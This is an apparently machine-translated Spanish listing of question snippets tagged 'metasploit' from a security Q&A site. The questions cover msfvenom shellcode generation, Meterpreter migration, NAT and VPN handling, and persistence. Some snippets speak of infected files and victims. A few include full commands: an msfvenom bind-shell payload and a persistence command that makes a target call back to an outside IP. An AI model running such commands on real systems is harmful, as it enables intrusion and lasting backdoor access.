Preguntas con etiqueta 'metasploit'

1
respuesta

msfvenom -b ¿el indicador no funciona?

Cuando uso msfvenom, asumo que la siguiente sintaxis debería proporcionarme el código de shell sin \ x00 \ x0a \ x0d o \ x40, debido a la opción -b msfvenom -p windows/shell/bind_tcp -b '\x00\x0a\x0d\x40' -f python Sin embargo, cada código...
hecha 12.05.2014 - 19:01
2
respuestas

Shellcode que es más pequeño que 295 bytes que genera un shell [cerrado]

Las cargas útiles de Metasploit producen códigos de shell de más de 300 bytes. Pero quiero que mis códigos de shell generen menos de 295 bytes. ¿Puede alguien mostrarme los enlaces a estos códigos de shell? Gracias.     
hecha 02.09.2012 - 05:51
1
respuesta

¿Es posible obtener una notificación en metasploit?

¿Es posible obtener una notificación después de que una víctima descargue un archivo infectado? ¿Para que no deba pasar días esperando una conexión?     
hecha 12.03.2017 - 08:39
1
respuesta

¿Cómo se migra 32 bit Meterpreter al proceso de 64 bit?

Si tiene un Meterpreter de 32 bits ejecutándose en un sistema remoto de 64 bits, puede migrar a procesos de 64 bits. Esto no es nada nuevo y ha sido usado por malware durante años, pero lo que me hace pensar es cómo hace esto en Windows 10?...
hecha 14.01.2017 - 23:24
2
respuestas

No estoy recibiendo sesiones de meterpreter cuando estoy conectado a un Openvpn

Tengo un enrutador y los puertos necesarios para que la puerta trasera se vuelva a conectar al oyente se reenvían a la dirección IP interna de mi máquina. Todo funciona bien solo cuando no estoy usando VPN. Pero después de conectarme a una VP...
hecha 16.06.2017 - 17:25
1
respuesta

SELinux Privilege Escalation Metasploit Nexus 5 Android 5.0.1 LRX22C después de Stagefright

Estoy preparando una parte de un día de concienciación sobre seguridad y una parte del "programa" debe ser sobre la seguridad móvil. Pensé en mostrar el exploit stagefright . Así que empecé con la adquisición de un teléfono móvil compatibl...
hecha 19.02.2017 - 11:54
1
respuesta

Actualizar shell a meterpreter detrás de NAT

He estado jugando con Metasploit la semana pasada, y pude obtener con éxito un shell básico de la víctima a través de Internet. Actualmente tengo: Creó un DDNS que apunta a mi IP pública Configure el reenvío de puertos para todos los pue...
hecha 24.09.2015 - 03:34
3
respuestas

Instale un servicio vulnerable para Windows 7

Tengo algún tipo de proyecto o demostración, donde tengo que explotar Windows 7 para obtener un shell remoto. Realicé un análisis de vulnerabilidad con nessus en mi máquina con Windows 7, pero no encontré ningún tipo de vulnerabilidad que me...
hecha 31.03.2016 - 16:33
1
respuesta

¿Cómo funciona la persistencia de metasploit?

Cuando explotamos de forma remota un objetivo con meterpreter, podemos usar el comando run persistence -U -i 10 -p 12345 -r 192.168.1.1 para hacer que un programa persistente intente conectarse a la máquina cuya dirección IP sea 192.168....
hecha 03.04.2016 - 16:41
1
respuesta

usando netcat como controlador para windows / meterpreter / reverse_tcp payload

Cómo podemos usar netcat como controlador para windows / meterpreter / reverse_tcp payload. Estoy obteniendo la conexión pero no puedo ejecutar ningún comando.     
hecha 23.05.2016 - 16:12